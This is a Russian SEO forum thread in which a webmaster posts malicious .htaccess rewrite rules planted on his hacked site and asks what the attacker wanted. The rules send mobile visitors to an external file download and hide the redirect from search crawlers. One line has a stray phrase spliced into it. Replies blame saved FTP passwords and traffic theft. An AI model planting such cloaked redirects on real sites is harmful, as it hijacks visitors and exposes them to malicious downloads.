SEO Сообщество: Спрашивайте и помогайте

Присоединяйтесь к сообществу профессиональных веб-мастеров PR-CY, отвечайте на вопросы коллег и задавайте свои.

Q&A SEO

Поскажите в чем суть вопроса:

yetiman yetiman  
58
  29.05.2012 23:04       1 190    
Сайт взломали. В htaccess дописали строки (сразу предупрежу - сайт, на который перенаправляют, зараженный). 

RewriteEngine   onRewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeСайт на собственном движке.ker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]RewriteRule    (.*)    http://uxfile.com/odn_agent/u/1783/odn_agent.auto    [L,R=302]


Чего хотел взломщик ? 
Где может быть дыра?

З.Ы. Сайт на собственном движке.

Ответы на пост (5) Написать ответ
orange-tvv orange-tvv
127
29.05.2012 23:09
хранил пароли в фтп клиенте
0
yetiman yetiman
58
29.05.2012 23:12
Да, грешен )).
0
Taras2010 Taras2010
30
29.05.2012 23:11
Взломщик хочет перенаправлять wap трафик на свою пп
0
webscs webscs
10
30.05.2012 00:31
З.Ы. что хотел - мобильный трафик идет на его одностраничник. где дыра - двиг самопис. На таких сайтах обычно огромное количество дыр бывает.

З.Ы.З.Ы. мой самописник недавно ломали, нашел очередные дыры и закрыл, жду очередной поход хакеров на сайт )))
0
FAQ1 FAQ1
12
30.05.2012 06:24
Про то, чего хотел взломщик, вам уже написали. Тот сайт не зараженный, просто там размещены файлы, которые АВ распознают, как вирусный. Если сервер общий, также могут через другие аккаунты, и по вашему гулять. Зависит от хостера и его защиты. Да, и никогда не сохраняйте пароли в ФТП!

ПС. Из-за таких редиректов, ПС могут и на ваш сайт наложить санкции, так что внимательнее. Чаще проверяйте свои .htaccess
1